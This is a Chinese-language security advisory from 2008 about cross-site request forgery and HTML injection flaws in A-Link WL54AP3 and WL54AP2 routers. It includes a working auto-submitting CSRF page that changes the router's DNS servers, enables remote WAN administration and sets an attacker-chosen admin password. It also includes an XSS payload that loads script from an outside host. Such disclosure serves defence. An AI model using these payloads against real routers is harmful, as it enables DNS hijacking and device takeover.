A-Link WL54AP3和WL54AP2跨站请求伪造和HTML注入漏洞
发布日期:2008-10-31
更新日期:2008-11-17
受影响系统:A-Link WL54AP3
A-Link WL54AP2
描述:
BUGTRAQ ID:
32008
A-Link WL54AP3和WL54AP2都是54M的无线宽带路由器。
WL54AP3和WL54AP2路由器没有正确的验证HTTP请求的来源,如果用户受骗查看了恶意网页或跟随了恶意链接的话,就可能导致跨站请求伪造或跨站脚本攻击。
成功攻击要求攻击者知道目标设备的管理接口地址(默认IP地址为192.168.1.254)。由于管理页面没有注销功能,及时已经关闭了包含有管理界面的标签页,只要没有关闭浏览器窗口或清除cookie,用户仍受这种攻击的影响。
<*来源:Henri Lindberg (
henri.lindberg@louhi.fi)
链接:
http://secunia.com/advisories/32421/
http://marc.info/?l=bugtraq&m=122573302126966&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
跨站请求伪造
<html>
<body onload="document.wan.submit(); document.password.submit()">
<form action="
http://192.168.1.254/goform/formWanTcpipSetup"
method="post" name="wan">
<input type="hidden" value="dnsManual" name="dnsMode" checked>
<input type="hidden" name="dns1" value="216.239.32.10">
<input type="hidden" name="dns2" value="216.239.32.10">
<input type="hidden" name="dns3" value="216.239.32.10">
<input type="hidden" name="webWanAccess" value="ON"
checked="checked">
</form>
<form action="
http://192.168.1.254/goform/formPasswordSetup"
method="post" name="password">
<input type="hidden" name="username" value="mallory">
<input type="hidden" name="newpass" value="gotroot">
<input type="hidden" name="confpass" value="gotroot">
</form>
</body>
</html>
跨站脚本
""><script src="
http://l7.fi"></script><p建议:
厂商补丁:
A-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.a-link.com/浏览次数:2559
严重程度:0(网友投票)